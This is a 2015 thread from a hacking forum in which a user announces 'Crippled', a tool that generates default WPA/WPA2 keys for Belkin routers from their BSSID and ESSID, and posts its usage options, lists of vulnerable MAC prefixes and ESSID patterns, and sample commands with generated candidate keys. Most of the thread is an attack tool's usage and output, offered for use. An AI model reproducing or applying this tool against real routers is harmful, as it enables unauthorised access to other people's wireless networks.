EvilZone

Programming and Scripting => Scripting Languages => : GuerrillaWarfare May 24, 2015, 07:23:50 AM

: Crippled - WPA/WPA2 default key generator
: GuerrillaWarfare May 24, 2015, 07:23:50 AM
I PRESENT TO YOU Crippled (https://github.com/GuerrillaWarfare/Crippled) ! it's a LEGIT WPA/WPA2 default key generator!

right now it only supports Belkin.XXXX, Belkin_XXXXXX, belkin.xxx and belkin.xxxx based routersbut i guarantee you that it will support MANY different routers in the future.

anyway ... it will be updated with each new PoC that i implement. If you have any questions, please ask them RIGHT HERE in this thread :)

anyway .... here's the repo ... >>> https://github.com/GuerrillaWarfare/Crippled <<<
: Re: Crippled - WPA/WPA2 default key generator
: iTpHo3NiX May 24, 2015, 08:07:05 AM
Description? What it does? Usage?
: Re: Crippled - WPA/WPA2 default key generator
: GuerrillaWarfare May 24, 2015, 08:56:54 AM
What does it do ? ... Read the Topic header :P

Usage:

    Basic Usage: ./crippled.py -b 94:44:52:00:C0:DE -e Belkin.c0de

    -h | show this help message and exit

    -w [WORDLIST] | Write outputed keys to file.

    -a | Create all possible key cases.

    -l | List all vulnerable mac address so far.

    Required Options:
    -----------------
    -b [BSSID]

    -e [ESSID]


    # PRACTICAL EXAMPLES #
    ----------------------

    ./crippled.py -l

   

        essid: Belkin.XXXX
        essid: Belkin_XXXXXX
        essid: belkin.xxxx
        essid: belkin.xxx

        bssid: 94:44:52:uv:wx:yz
        bssid: 08:86:3B:uv:wx:yz
        bssid: EC:1A:59:uv:wx:yz


    ./crippled.py -b 94:44:52:00:C0:DE -e Belkin.c0de

   

            040D93B0

    ./crippled.py -b 94:44:52:00:ce:d0 -e belkin.ed0

   

            d49496b9

    ./crippled.py -b 94:44:52:00:ce:d0 -a

   

            64949db9
            D40493B0
            649996b9
            649496b9
            d49496b9
            34029DB0
            d49996b9
            D40293B0
            64999db9
            340493B0
            34009DB0
            340093B0
            34049DB0
            340293B0
            D40093B0


    ./crippled.py -b 94:44:52:00:ce:d0 -a -w keys.txt

    $ cat keys.txt

    64949db9
    D40493B0
    649996b9
    649496b9
    d49496b9
    34029DB0
    d49996b9
    D40293B0
    64999db9
    340493B0
    34009DB0
    340093B0
    34049DB0
    340293B0
    D40093B0